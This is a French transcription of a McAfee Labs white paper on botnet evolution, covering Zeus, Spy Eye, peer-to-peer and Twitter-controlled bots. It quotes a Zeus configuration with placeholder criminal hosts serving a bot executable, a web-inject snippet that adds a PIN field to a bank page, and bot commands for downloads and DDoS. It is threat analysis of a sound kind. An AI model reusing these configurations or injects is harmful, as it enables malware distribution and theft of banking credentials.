LES RÉSEAUX DE ROBOTS À L'AUBE D'UNE NOUVELLE ÈRE - ZHENG BU, PEDRO BUENO, RAHUL KASHYAP ET ADAM WOSOTOWSKY MCAFEE LABS
←
→
Transcription du contenu de la page
Si votre navigateur ne rend pas la page correctement, lisez s'il vous plaît le contenu de la page ci-dessous
Livre blanc Les réseaux de robots à l'aube d'une nouvelle ère Zheng Bu, Pedro Bueno, Rahul Kashyap et Adam Wosotowsky McAfee Labs™
Livre blanc Les réseaux de robots à l'aube d'une nouvelle ère Sommaire Le développement 3 Evolution 4 Robots IRC 4 Robots localisés 4 Robots peer-to-peer 4 Robots HTTP 5 Spy Eye 7 Prévalence mondiale 8 La distribution des réseaux de robots : principales menaces par pays 9 Le rôle des gouvernements 10 Personnes et entités à risque 11 Perspectives d'avenir 11 Une nouvelle génération de zombies de réseau social 12 Des méthodes toujours plus furtives 13 Une nouvelle arme : McAfee Global Threat Intelligence 14 Références 14 A propos de McAfee Labs™ 14 A propos de McAfee 14
Livre blanc Les réseaux de robots à l'aube d'une nouvelle ère L'histoire des réseaux de robots, ou botnets, a connu quelques rebondissements. Par essence, un robot (bot) n'est jamais qu'une série de scripts ou de commandes, ou un programme conçu pour établir une connexion (généralement à un serveur) et exécuter une ou plusieurs commandes. Fondamentalement, il sert à exécuter de multiples fonctions ; il n'est pas nécessairement malveillant ou nuisible par nature. Son usage a évolué au fil du temps. Au départ simples « observateurs » de canaux ou de jeux (comme les robots Bartender de Wisner ou GM de Lindahl), les robots fournissent aujourd'hui des services spécialisés, notamment dans le cadre de la gestion des bases de données ou de la maintenance des listes d'accès. Le présent rapport se penche, quant à lui, sur un type d'utilisation très différent : le contrôle de robots (également appelé « drones » ou « zombies ») par des cybercriminels pour faciliter et développer leurs activités délictueuses. Ces activités répréhensibles affectent les entreprises de diverses façons : vol de secrets commerciaux, incorporation de logiciels malveillants dans des fichiers de code source, perturbation de l'accès ou des services, compromission de l'intégrité des donnés et vol des informations d'identité du personnel. Elles peuvent avoir des conséquences catastrophiques sur une entreprise et entraîner, par exemple, un baisse des revenus, des infractions aux réglementations, la perte de confiance des clients, une réputation entachée, voire la faillite de l'entreprise. En ce qui concerne les administrations publiques et les organismes de secteur public, l'impact revêt une portée encore plus grande. Ce livre blanc étudie l'évolution des robots criminels, le secteur qui soutient leur création et leur distribution ainsi que leurs divers modes d'utilisation par les réseaux cybercriminels actuels. Il envisage également l'évolution probable des robots dans un avenir proche. Le développement Les réseaux de robots affichent, malheureusement, une belle courbe de croissance. Les robots et les réseaux de robots du début de ce siècle ont été créés par des programmeurs dotés de connaissances pointues des réseaux et des protocoles, notamment le protocole IRC (Internet Relay Chat). L'exploitation d'IRC a marqué le début d'une tendance au contrôle centralisé. Le robot SDBot, l'un des premiers et des plus célèbres, a été codé en langage C++. (Son utilisation s'est rapidement répandue car son auteur a publié le code source, ce qui constitue une pratique assez inhabituelle.) Les versions ultérieures de SDBot, également appelé SpyBot, ont commencé à exploiter les vulnérabilités des appels de procédure à distance de Microsoft. Pour créer de tels robots, les programmeurs devaient disposer de compétences en codage d'exploits. A cette époque, la prolifération des robots et des botnets a été favorisée par les nombreuses vulnérabilités présentes sur les plates-formes Windows les plus populaires, que les programmeurs n'ont pas manqué d'exploiter. Les robots apparus par la suite intégraient, en plus, des fonctionnalités conçues notamment pour lancer des attaques par déni de service, analyser les ports et enregistrer les frappes au clavier. Pour concevoir ces logiciels malveillants, leurs auteurs devaient maîtriser un langage assembleur et bénéficier d'excellentes connaissances en matière de réseaux. Le robot RBot, apparu en 2003, a été le premier à utiliser des programmes et modèles de compression et de chiffrement tels que UPX, Morphine et ASPack. L'emploi de ces technologies a contribué à l'émergence d'une nouvelle génération de programmeurs hautement qualifiés qui comprenaient les modèles de chiffrement et la cryptographie et savaient intégrer les techniques de contournement aux fichiers binaires qu'ils créaient. A ce stade, plus aucun retour en arrière n'était possible. Le succès de RBot a ouvert la voie à l'emploi généralisé des techniques de chiffrement et de dissimulation dans les robots et les réseaux de robots. Pour faciliter le contrôle de ces réseaux et les communications, l'une des grandes innovations a été l'utilisation des réseaux peer-to-peer, notamment par Sinit (2003) et Phatbot (2004). L'adoption de la technologie peer-to-peer a révolutionné la communication des réseaux de robots. Elle a d'ailleurs favorisé l'apparition, en 2007, d'un des réseaux de robots peer-to-peer les plus évolués qui soient : Storm Worm/Nuwar. Ce réseau, qui reposait sur une architecture peer-to-peer décentralisée, a été pendant un certain temps exceptionnellement difficile à neutraliser. Les nombreuses solutions de sécurité qui ont été développées pour combattre cette menace ont conduit à une sophistication croissante de la technologie des robots. Celle-ci a favorisé à son tour le développement de nouvelles technologies de sécurité, donnant lieu à une relation très complexe entre auteurs de logiciels malveillants et éditeurs de solutions de sécurité, où les offensives des uns succèdent aux contre-offensives des autres. Il ne fait aucun doute que les réseaux de robots ont gagné en complexité. Ils exigent de leurs auteurs des connaissances approfondies des technologies réseau, des systèmes et de la cryptographie. A la lumière de leur envergure et de leur degré de sophistication, il est clair que ces réseaux de robots ne sont pas le fait d'un petit groupe d'individus mais d'un véritable milieu cybercriminel, motivé par les gains financiers générés par ces activités. Leur objectif est clair : la compromission des entreprises et le vol de données possédant une valeur monétaire. 3
Livre blanc Les réseaux de robots à l'aube d'une nouvelle ère Evolution Robots IRC Les premiers robots n'étaient pas toujours malveillants. Bien que cela ne soit plus vrai à présent, surtout depuis leur explosion aux environs de 2004, les robots de la première génération utilisaient généralement IRC comme protocole de contrôle. IRC a été le premier protocole utilisé pour établir des connexions aux salles de conversation (chat rooms). Très couramment utilisé il y a dix à quinze ans, il permettait aux utilisateurs d'échanger des messages. Toutefois, avec l'avènement des protocoles de messagerie instantanée, tels que ICQ, AIM et MSN Messenger, IRC a quelque peu perdu les faveurs du public, même s'il est toujours utilisé par de nombreux professionnels de la sécurité et des réseaux traditionalistes. Les premiers robots ont été créés pour se connecter à ces salles de conversations (aussi appelées channels, « canaux ») et faire en sorte que le canal de communication reste ouvert, mais aussi pour reconnaître les opérateurs du canal et leur permettre de le contrôler. Certains programmeurs malveillants se sont mis à créer des robots capables de balayer le réseau et d'exploiter les ordinateurs vulnérables. Dès qu'un ordinateur était compromis, le robot se connectait à une salle de conversation (canal) spécifique et recevait ses instructions du maître du réseau de robots, par exemple le lancement d'une attaque par déni de service contre un site web. Cette tactique est toujours utilisée à l'heure actuelle, comme l'illustre la récente attaque W32/Vulcanbot lancée contre des sites web de militants pour les droits de l'homme. D'autres fonctions IRC courantes consistent par exemple à effectuer des captures d'écran de l'hôte, à télécharger ou à mettre à niveau un robot, etc. Certains robots peuvent exécuter plus de cent commandes. L'année 2004 a été caractérisée par une explosion du nombre de robots, due à la commercialisation de nombreuses applications à interface utilisateur graphique qui permettaient aux pirates informatiques de créer des robots par un simple pointer-cliquer. La simplification du processus de création a représenté une grande avancée pour les cybercriminels et les auteurs de programmes malveillants : il n'était plus nécessaire de posséder des compétences en programmation ni des connaissances approfondies des protocoles réseau et des systèmes d'exploitation pour pouvoir créer un large éventail de robots. Quelques clics suffisaient. Robots localisés Bien que les robots s'exécutent en grande majorité sur des versions de Windows, certaines versions localisées sont également apparues. A l'aide du langage de script Perl, des pirates informatiques ont créé des versions de robots qui s'exécutent aussi sur plusieurs versions des systèmes Unix et Linux. C'est le groupe brésilien Atrix-Team, au départ constitué de pirates en herbe, qui en est à l'origine. En raison du format en code source ouvert de ces robots, bon nombre de ces versions sont encore employées aujourd'hui. Robots peer-to-peer Les réseaux de robots IRC d'ancienne génération sont toujours populaires, mais ils souffrent d'un point de défaillance unique : le serveur IRC. Une fois ce dernier arrêté, le pirate perd le contrôle de son armée de robots. L'année 2007 a vu apparaître un nouveau type de réseau de robots basé sur des protocoles P2P. Ce sont les mêmes protocoles que ceux utilisés par de nombreux programmes pour télécharger de la musique, par exemple. L'un de ces réseaux utilisait une implémentation chiffrée basée sur le protocole eDonkey. Ce logiciel malveillant jouit d'une grande notoriété : au départ connu sous le nom de W32/Nuwar, il est devenu célèbre sous le nom de ver Storm. Storm incorporait près de cent « peers » (les unités d'un réseau peer-to-peer) codés sous la forme de valeurs de hachage, que le programme malveillant déchiffrait et utilisait pour vérifier les nouveaux fichiers à télécharger. Toutes les transactions étant chiffrées, seul le logiciel malveillant pouvait déchiffrer la réponse et exécuter l'opération demandée. Les réponses redirigeaient généralement vers des URL qui provoquaient le téléchargement d'autres fichiers binaires. Storm a été à l'origine de la plupart du spam apparu au cours des années 2007 et 2008 avant d'être démantelé. L'avantage de l'approche peer-to-peer réside dans sa structure de contrôle distribuée et résiliente, qui rend l'arrêt d'un réseau de robots IRC plus ardu. Toutefois, elle est plus difficile à gérer et à propager en raison de sa complexité. Encore très récemment (à la fin du mois d'avril 2010), nous avons découvert un autre logiciel malveillant qui utilisait en partie le même code que le ver Storm, notamment le code responsable d'attaques de spam et par déni de service. 4
Livre blanc Les réseaux de robots à l'aube d'une nouvelle ère Robots HTTP Il y a deux ou trois ans, nous avons observé un changement dans la manière dont les réseaux de robots sont contrôlés, passant des canaux IRC à des sites web utilisant le protocole HTTP. Ce passage à un protocole courant est une manœuvre très intelligente de la part des cybercriminels et des auteurs de logiciels malveillants. Cette transition vers HTTP a commencé grâce aux progrès réalisés en matière de « kits d'exploit ». Ces kits, développés principalement par des cybercriminels russes, incluent Mpack, ICEPack et Fiesta. Ils sont capables d'installer des logiciels sur des ordinateurs distants et de les contrôler à partir d'un site web distant. Le cybercriminel envoie du spam ou un message instantané contenant divers liens à des victimes potentielles. Ces liens redirigent les utilisateurs vers un site web sur lequel le kit d'exploit est installé. A ce moment, le kit détermine quel exploit utiliser en fonction des caractéristiques de l'ordinateur cible : le pays, le système d'exploitation, le navigateur et les multiples versions d'applications clientes. Toutes ces opérations se déroulent de façon dynamique, à l'insu de l'utilisateur. Si l'exploitation réussit, il est possible d'installer ultérieurement d'autres logiciels malveillants afin de prendre le contrôle de l'ordinateur infecté. De tous les réseaux de robots HTTP actuels, le réseau Zeus (également appelé Zbot) est un cas à part, spécialisé dans le vol d'informations d'identification bancaires. Zeus est composé d'un élément client et d'un élément serveur. L'élément serveur possède un outil de type générateur (« builder ») qui permet au maître du réseau de robots de créer sur le client une variante du logiciel malveillant PWS‑ZBot, qui infecte ensuite un ordinateur et l'intègre au réseau de robots en le connectant à un site web distant qui héberge le serveur Zeus. Zeus est caractéristique d'une nouvelle tendance qui permet à pratiquement n'importe qui de créer facilement une version personnalisée du logiciel malveillant. Le kit d'outils Zeus est assez cher à l'achat, mais son auteur tout prévu pour que l'outil soit simple à utiliser et donc facile à vendre à un grand nombre, ce qui augmente d'autant ses revenus. L'exemple suivant illustre l'outil Zeus Builder version 1.2.x : Le volet de gauche affiche deux options seulement : Information et Builder. La sélection de l'option Information permet de savoir si l'ordinateur est infecté par Zeus. Quant à l'option Builder, elle offre à l'individu qui contrôle le kit la possibilité de construire un nouveau robot. Le kit utilise deux fichiers d'entrée : Config et WebInjects. Bien que l'outil Zeus Builder possède un bouton destiné à modifier le fichier Config, il s'agit simplement d'un raccourci. Le fichier est modifié à l'aide du Bloc-notes. Le fichier Config contient les paramètres que le robot doit exécuter. 5
Livre blanc Les réseaux de robots à l'aube d'une nouvelle ère Exemples de fichier Config : … url_config "http://www.[adresse-IP-malfaiteurs].cn/cp/config.bin" url_compip "http://www.[adresse-IP-malfaiteurs].com/" 2048 encryption_key "12345654321" ;blacklist_languages 1049 end entry "DynamicConfig" url_loader "http://www.[autre-adresse-IP-malfaiteurs].cn/cp/bot.exe" … Cet extrait du fichier Config indique au robot où télécharger le fichier de configuration et le robot lui-même. Ces étapes permettent aux maîtres des réseaux de robots de mettre à jour les robots et les configurations avec de nouvelles fonctionnalités et cibles à tout moment. Elles leur permettent également de distribuer le fichier de configuration et le fichier binaire du robot vers différents serveurs et de rendre ainsi le réseau résilient grâce à une architecture distribuée. Le second fichier nécessaire à la création du robot est WebInject. Ce fichier spécifie les cibles, ou victimes, à qui l'auteur du logiciel malveillant ou propriétaire du kit d'outils veut dérober des informations. Zeus est en mesure de collecter les informations de la page web d'origine mais aussi d'insérer des champs supplémentaires. Il peut donc s'emparer d'informations supplémentaires si son propriétaire le décide. Exemple de fichier WebInject : … set_url https://www.[grande-banque-victime].com/* G data_before data_end data_inject ATM PIN: data_end data_after data_end … Ce code permet de recueillir des informations sur l'URL cible, qui dans cet exemple est une banque. Outre le nom d'utilisateur et le mot de passe, Zeus injecte un autre champ pour recueillir le code de la carte bancaire. 6
Livre blanc Les réseaux de robots à l'aube d'une nouvelle ère Comme de nombreux autres logiciels malveillants populaires, Zeus a donné lieu à plusieurs versions « piratées » de son outil Builder. Comble de l'ironie, certains d'entre eux incorporaient même leur propre porte dérobée (backdoor). La capture d'écran suivante illustre l'une de ces versions piratées : Cette version, appelée MultiBuilder, a permis de créer deux variantes basées sur Zeus version 1.3. Récemment, les auteurs de Zeus sont passés de la version 1.3 à la version 2.0, laquelle contient désormais un modèle de licence strict. Etonnamment, Zeus est en fait lié à l'ordinateur de l'acheteur à l'aide d'une licence logiciel commerciale. La technique de création et le canal de distribution de ce logiciel malveillant témoignent d'un grand sens des affaires. Spy Eye Spy Eye est un autre exemple de robot HTTP complexe. Il présente plusieurs similitudes avec Zeus, principalement en cela qu'il s'agit aussi d'un outil de collecte d'informations de formulaire et qu'il repose sur une architecture de contrôle impressionnante. A l'instar de Zeus, Spy Eye possède son propre générateur graphique : 7
Livre blanc Les réseaux de robots à l'aube d'une nouvelle ère Spy Eye a ceci d'intéressant qu'il peut détruire (supprimer) Zeus de l'ordinateur qu'il infecte, illustrant ainsi les luttes intestines au sein de la communauté des auteurs de logiciels malveillants. Cette rivalité n'est pas nouvelle. Pour éviter d'être analysés par leurs cibles, Zeus et Spy Eye offrent tous deux la possibilité d'utiliser une clé de chiffrement pendant le processus de génération du robot. Dans les premières versions de Zeus, cette clé était intégrée au code, ce qui permettait aux professionnels de la sécurité d'analyser et d'identifier plus rapidement les cibles du logiciel malveillant. Avec cette nouvelle fonctionnalité, les cybercriminels sont passés à la vitesse supérieure. Prévalence mondiale Distribution globale des réseaux de robots par pays Inde Brésil Russie Allemagne Etats-Unis Grande-Bretagne Colombie Indonésie Italie Espagne Argentine Pologne Pakistan Portugal Vietnam Corée du Sud Grèce Chine Belarus Australie Autres Figure 1 — McAfee Labs a observé plus de détections de réseaux de robots (près d'un million et demi) en Inde que dans n'importe quel autre pays. Le Brésil, la Russie et l'Allemagne dépassent également le million d'infections. 8
Livre blanc Les réseaux de robots à l'aube d'une nouvelle ère La distribution des réseaux de robots : principales menaces par pays Allemagne Argentine Asprox Australie Belarus Asprox Asprox Asprox Bagle-CB Bagle-CB Bagle-CB Bagle-CB Bobax Bobax Bobax Bobax Cimbot Cimbot Cimbot Cimbot Cutwail Cutwail Cutwail Cutwail Cutwail2 Cutwail2 Cutwail2 Cutwail2 DarkMailer DarkMailer DarkMailer DarkMailer Dlena Dlena Dlena Dlena Donbot Donbot Donbot Donbot Festi Festi Festi Festi Gheg Gheg Gheg Gheg Grum Grum Grum Grum Grum2 Grum2 Grum2 Grum2 HelloGirl HelloGirl HelloGirl HelloGirl Lethic Lethic Lethic Lethic Maazben Maazben Maazben Maazben Mega-D Mega-D Mega-D Mega-D Netsky Netsky Netsky Netsky Autres Autres Autres Autres RK1 RK1 RK1 RK1 RK2 RK2 RK2 RK2 Reposin Reposin Reposin Reposin Rustock Rustock Rustock Rustock Storm Storm Storm Storm TwitGenPhish TwitGenPhish TwitGenPhish TwitGenPhish Xarvester Xarvester Xarvester Xarvester Brésil Asprox Chine Asprox Colombie Asprox Corée du Sud Asprox Bagle-CB Bagle-CB Bagle-CB Bagle-CB Bobax Bobax Bobax Bobax Cimbot Cimbot Cimbot Cimbot Cutwail Cutwail Cutwail Cutwail Cutwail2 Cutwail2 Cutwail2 Cutwail2 DarkMailer DarkMailer DarkMailer DarkMailer Dlena Dlena Dlena Dlena Donbot Donbot Donbot Donbot Festi Festi Festi Festi Gheg Gheg Gheg Gheg Grum Grum Grum Grum Grum2 Grum2 Grum2 Grum2 HelloGirl HelloGirl HelloGirl HelloGirl Lethic Lethic Lethic Lethic Maazben Maazben Maazben Maazben Mega-D Mega-D Mega-D Mega-D Netsky Netsky Netsky Netsky Autres Autres Autres Autres RK1 RK1 RK1 RK1 RK2 RK2 Reposin RK2 RK2 Reposin Rustock Reposin Reposin Rustock Storm Rustock Rustock Storm TwitGenPhish Storm Storm TwitGenPhish Xarvester TwitGenPhish TwitGenPhish Xarvester Xarvester Xarvester Espagne Etats-Unis Asprox Grande-Bretagne Asprox Grèce Asprox Asprox Bagle-CB Bagle-CB Bagle-CB Bagle-CB Bobax Bobax Bobax Bobax Cimbot Cimbot Cimbot Cimbot Cutwail Cutwail Cutwail Cutwail Cutwail2 Cutwail2 Cutwail2 Cutwail2 DarkMailer DarkMailer DarkMailer DarkMailer Dlena Dlena Dlena Dlena Donbot Donbot Donbot Donbot Festi Festi Festi Festi Gheg Gheg Gheg Gheg Grum Grum Grum Grum Grum2 Grum2 Grum2 Grum2 HelloGirl HelloGirl HelloGirl HelloGirl Lethic Lethic Lethic Lethic Maazben Maazben Maazben Maazben Mega-D Mega-D Mega-D Mega-D Netsky Netsky Netsky Netsky Autres Autres Autres Autres RK1 RK1 RK1 RK1 RK2 RK2 RK2 RK2 Reposin Reposin Reposin Reposin Rustock Rustock Rustock Rustock Storm Storm Storm TwitGenPhish Storm TwitGenPhish TwitGenPhish Xarvester TwitGenPhish Xarvester Xarvester Xarvester 9
Livre blanc Les réseaux de robots à l'aube d'une nouvelle ère Inde Indonésie Asprox Italie Asprox Pakistan Asprox Asprox Bagle-CB Bagle-CB Bagle-CB Bagle-CB Bobax Bobax Bobax Bobax Cimbot Cimbot Cimbot Cimbot Cutwail Cutwail Cutwail Cutwail Cutwail2 Cutwail2 Cutwail2 Cutwail2 DarkMailer DarkMailer DarkMailer DarkMailer Dlena Dlena Dlena Dlena Donbot Donbot Donbot Donbot Festi Festi Festi Festi Gheg Gheg Gheg Gheg Grum Grum Grum Grum Grum2 Grum2 Grum2 Grum2 HelloGirl HelloGirl HelloGirl HelloGirl Lethic Lethic Lethic Lethic Maazben Maazben Maazben Maazben Mega-D Mega-D Mega-D Mega-D Netsky Netsky Netsky Netsky Autres Autres Autres Autres RK1 RK1 RK1 RK1 RK2 RK2 RK2 RK2 Reposin Reposin Reposin Reposin Rustock Rustock Rustock Rustock Storm Storm Storm Storm TwitGenPhish TwitGenPhish TwitGenPhish TwitGenPhish Xarvester Xarvester Xarvester Xarvester Pologne Portugal Asprox Russie Asprox Vietnam Asprox Asprox Bagle-CB Bagle-CB Bagle-CB Bagle-CB Bobax Bobax Bobax Bobax Cimbot Cimbot Cimbot Cimbot Cutwail Cutwail Cutwail Cutwail Cutwail2 Cutwail2 Cutwail2 Cutwail2 DarkMailer DarkMailer DarkMailer DarkMailer Dlena Dlena Dlena Dlena Donbot Donbot Donbot Donbot Festi Festi Festi Festi Gheg Gheg Gheg Gheg Grum Grum Grum Grum Grum2 Grum2 Grum2 Grum2 HelloGirl HelloGirl HelloGirl HelloGirl Lethic Lethic Lethic Lethic Maazben Maazben Maazben Maazben Mega-D Mega-D Mega-D Mega-D Netsky Netsky Netsky Netsky Autres Autres Autres Autres RK1 RK1 RK1 RK1 RK2 RK2 RK2 RK2 Reposin Reposin Reposin Reposin Rustock Rustock Rustock Rustock Storm Storm Storm Storm TwitGenPhish TwitGenPhish TwitGenPhish TwitGenPhish Xarvester Xarvester Xarvester Xarvester Figure 2 — Principaux réseaux de robots par pays. Rustock est de loin le réseau de robots le plus « populaire » au monde. Le rôle des gouvernements A mesure que la menace de cyberguerre se précise et que les dommages potentiels d'une telle guerre augmentent, tout porte à croire que les réseaux de robots seront une arme de prédilection dans les conflits à venir. Il se peut d'ailleurs qu'ils aient déjà été utilisés. Dans un monde où les technologies occupent une place de plus en plus importante, l'efficacité des communication est capitale dans la résolution ou la gestion d'une crise. L'organisation des ressources et leur capacité à réagir face à des incidents d'origine naturelle ou humaine dépendent fortement d'Internet, un outil capital dans la diffusion des informations à un large éventail de parties et à la coordination de leurs réponses. Toute dégradation ou interruption de ce flux d'informations peut encore aggraver un incident. Internet pourrait bien devenir un nouveau théâtre de combats. Des événements tels que la marée noire dans le Golfe du Mexique, les attentats à la bombe en Europe et en Irak ou les manœuvres navales entre les deux Corées peuvent être affectés par des interruptions ciblées des organes de presse ou des équipes d'intervention d'urgence qui dépendent d'Internet. Il est possible d'acheter ou de louer des réseaux de robots au marché noir, voire même d'en prendre le contrôle et de les utiliser à d'autres fins. Ce type d'intervention n'étant pas rare, il serait donc naïf de croire que des agences du secteur public ou des Etats sont en reste et ne pourraient pas eux aussi acquérir des réseaux de robots à des fins offensives ou contre-offensives. Une entité civile ou nationale a toutes les raisons de vouloir s'emparer d'un réseau de robots. Ces réseaux infiltrent les sociétés privées, les particuliers et les organismes officiels ainsi que les postes de travail militaires. Il est capital que les droits de propriété intellectuelle et de confidentialité des citoyens et des institutions du monde entier soient protégés contre des individus susceptibles d'en faire une utilisation illégale. La prise de contrôle d'un réseau de robots contraint son nouveau « maître » à décider d'une stratégie : soit démanteler le système, ce qui peut endommager les ordinateurs qui font partie du réseau de robots, provoquer des interruptions au niveau de l'infrastructure et éventuellement mettre en 10
Livre blanc Les réseaux de robots à l'aube d'une nouvelle ère cause la responsabilité du nouveau maître du réseau ; soit désactiver le réseau jusqu'à la mise à niveau des nœuds infectés et leur « affranchissement » ; soit encore surveiller le réseau de robots pour identifier et procéder à l'arrestation de son contrôleur. Chacune de ces options est sujette à controverse. Personnes et entités à risque Tous les utilisateurs d'ordinateur courent un risque puisque tous (ou presque) se servent d'Internet. Les moyens dont disposent les cybercriminels pour infecter un hôte ou un réseau avec leurs robots ou toute autre forme de logiciel malveillant sont limités. Ils ont généralement recours à l'ingénierie sociale, une technique qui revient essentiellement à « pirater » le cerveau humain. Les auteurs d'attaques emploient un stratagème ou un leurre pour inciter les internautes à cliquer sur un lien ou à installer un programme alors que ce n'était pas leur intention au départ. A l'heure actuelle, l'une des techniques les plus répandues et astucieuses consiste à exploiter des événements très médiatisés. L'actualité est la même pour tous et les cybercriminels savent pertinemment que de nombreux internautes lisent la presse en ligne. Qu'il s'agisse d'un lien vers une vidéo sur une catastrophe récente ou un scandale impliquant une célébrité, ces leurres ont un attrait irrésistible pour bon nombre d'utilisateurs. Les auteurs de ces attaques pourraient donner des leçons aux responsables marketing par leurs connaissances pointues du comportement humain et des centres d'intérêt des utilisateurs lorsqu'ils surfent sur Internet. Tous les internautes doivent être conscients des risques associés à la navigation et à l'utilisation des technologies web 2.0 car c'est l'arme de prédilection des cybercriminels. Même si les particuliers doivent se méfier des attaques véhiculées par les sites de réseau social, ce sont les sociétés et les gouvernements qui ont le plus à pâtir des attaques de réseaux de robots. Les menaces auxquelles les sociétés sont exposées sont légion : • Fraude aux clics : vol de sommes considérables aux agences de publicité en ligne grâce à une technique qui consiste à accéder à des pages web et à exécuter automatiquement des clics sur des bannières publicitaires • Attaques par déni de service distribué : saturation de la bande passante pour bloquer le trafic légitime, attaques le plus souvent exécutées par des concurrents, des clients mécontents ou pour des raisons politiques • Infiltration des systèmes de fichiers : accès à des systèmes critiques dans le but de s'emparer d'informations sur les clients, de données confidentielles sur le personnel, de secrets commerciaux, de données financières, etc. • Désactivation de la sécurité en place : blocage des tentatives de nettoyage ou piratage par des propriétaires de robots concurrents • Spam : utilisation des ressources et de la bande passante d'autres systèmes pour envoyer d'énormes volumes de spam • Infection du code source : empoisonnement de toute l'arborescence du code source par l'insertion de modifications non autorisées et impossibles à détecter ou la découverte de nouvelles vulnérabilités à exploiter Les conséquences de ces attaques peuvent être graves et contraindre les sociétés à un investissement important en temps et en main d'œuvre pour les neutraliser. En outre, les sociétés peuvent être exposées à des sanctions et amendes pour non-respect des réglementations ou des normes sectorielles. Les clients, les employés ou d'autres parties peuvent également engager la responsabilité de la société lorsque celle‑ci n'a pas su respecter ses impératifs de sécurité. Pour les gouvernements et les propriétaires d'infrastructures critiques, les dommages provoqués par les réseaux de robots peuvent être encore plus graves : • Les attaques par déni de service peuvent perturber les communications en temps de crise. • Les infections du code source peuvent provoquer l'arrêt de réseaux critiques. • L'accès à des systèmes critiques peut permettre à l'ennemi de s'emparer de renseignements militaires. Perspectives d'avenir Au cours des six dernières années, les réseaux de robots sont devenus l'une des menaces majeures non seulement pour les professionnels de la sécurité mais aussi pour les entreprises et les particuliers — en d'autres mots, pour pratiquement tous les utilisateurs d'ordinateur. Ces réseaux sont désormais la principale infrastructure utilisée par les cybercriminels et certains gouvernements pour lancer pratiquement tous les types d'attaques informatiques : exfiltration de données, espionnage, spam et autres attaques par déni de service. McAfee Labs a déjà observé une nette tendance vers des infrastructures de réseaux de robots plus résilientes et distribuées, lesquelles reposent sur des technologies robustes telles que le peer-to-peer, le contrôle web et les services web 2.0 ainsi que sur des techniques de contournement et de basculement. 11
Livre blanc Les réseaux de robots à l'aube d'une nouvelle ère Une nouvelle génération de zombies de réseau social Les techniques employées par les créateurs de réseaux de robots connaissent une évolution parallèle à celle des services web 2.0 : les nouvelles technologies sont rapidement adoptées afin d'accroître la sophistication des attaques. A l'heure de la rédaction, KeriosC2 faisait son apparition. Il s'agit d'un outil de preuve du concept qui montre comment exploiter LinkedIn, Twitter et TinyURL pour contrôler un réseau de robots. Au même titre que les internautes du monde entier, les réseaux de robots profitent désormais des avantages offerts par les réseaux sociaux. Un phénomène qui ne peut qu'inquiéter. Tout porte à croire que les réseaux de robots continueront à exploiter pendant longtemps encore les applications et protocoles les plus courants et deviendront toujours plus difficiles à détecter et à bloquer. La situation a connu une nouvelle évolution en mai, lorsque certains robots ont commencé à utiliser Twitter pour recevoir des commandes. A ce stade, les fonctionnalités restent assez simples. Elles se contentent de « suivre » un compte Twitter pour recevoir des commandes. Comme vous pouvez le constater dans la capture d'écran suivante, le robot possède un générateur doté d'une interface utilisateur graphique très simple. A la différence des outils Zeus ou Spy Eye beaucoup plus complexes, ce formulaire ne contient aucune option mais un simple champ destiné à la saisie du nom de l'utilisateur Twitter que le robot suivra pour recevoir des commandes. A l'heure de la rédaction, la structure et la syntaxe des commandes étaient également rudimentaires. .VISIT ouvre une page spécifique. .DOWNLOAD télécharge un fichier depuis un emplacement distant. .DDOS exécute une attaque de type déni de service sur un ordinateur cible. 12
Livre blanc Les réseaux de robots à l'aube d'une nouvelle ère Des méthodes toujours plus furtives Les auteurs de réseaux de robots rivalisent d'ingéniosité pour tromper la vigilance des logiciels et périphériques de sécurité. Pour ce qui est de la procédure, les auteurs de logiciels malveillants testent généralement leurs programmes avec les produits des principaux éditeurs de sécurité afin de s'assurer que leurs logiciels échappent à la plupart des outils de détection. Par conséquent, les cybercriminels et auteurs de logiciels malveillants affirment souvent que leurs produits sont « indétectables ». Les listes de contrôle d'accès ou la mise en œuvre de stratégies relatives aux adresses IP peuvent constituer une mesure de contrôle efficace pour bloquer les connections d'un robot à ses serveurs de contrôle. Les créateurs de réseaux de robots et de logiciels malveillants ont contourné cette contre-mesure en implémentant des algorithmes en flux au lieu d'utiliser des listes d'adresses IP codées pour leurs serveurs de contrôle. Zeus a recours à cette technique pour générer des domaines à la volée. Cette stratégie permet de tenir en échec de nombreux mécanismes de détection classiques, basés sur les listes de blocage. Les cybercriminels ont mis au point de multiples techniques de contournement pour les téléchargements involontaires afin d'échapper au contrôle des appliances de sécurité réseau. A titre d'exemple, citons la manipulation des extensions de fichier effectuée par le générateur Gh0st RAT (illustrée dans la capture d'écran suivante). Les attaques de logiciels malveillants et notamment l'opération Aurora ont eu recours à des stratagèmes similaires. Pour installer leurs logiciels malveillants sur l'ordinateur cible sans être détectés, les auteurs exploitent de nombreuses autres méthodes, de l'encodage au chiffrement (par exemple le chiffrement XOR du fichier binaire). Ces dernières années, plusieurs réseaux de robots majeurs ont été démantelés. Face à ces succès du secteur de la sécurité et pour renforcer la robustesse et la résilience des infrastructures de réseaux de robots, les contrôleurs de ces réseaux ont commencé à introduire de nouvelle techniques. Comme nous l'avons déjà fait remarquer, les techniques basées sur les flux permettent d'améliorer la résilience des serveurs de contrôle. Les protocoles peer-to-peer, en dépit du coût de leur implémentation et de leur support, ont été également utilisés dans quelques réseaux de robots furtifs, tels que Storm et Nugache. Les protocoles web, qu'ils soient chiffrés ou non, sont largement utilisés comme protocole de commande à la place du protocole IRC, pour la simple raison que les pare-feux autorisent pratiquement toujours l'accès à ces ports web, même dans des réseaux d'entreprise extrêmement contrôlés. Pour McAfee Labs, il est clair que les cybercriminels et les créateurs de réseaux de robots continueront à exploiter pleinement les technologies web 2.0. Parmi les autres avancées technologiques escomptées, citons : • Extension des fonctionnalités et de l'accès à la plupart des navigateurs (en plus de Firefox et Internet Explorer) • Intégration encore plus étroite avec les technologies de messagerie instantanée, par exemple JabberZeuS, afin d'accéder plus rapidement aux données bancaires et autres • Meilleure intégration avec d'autres logiciels malveillants, notamment Bredolad et Pushdo, pour accroître la prévalence mondiale sur les systèmes 13
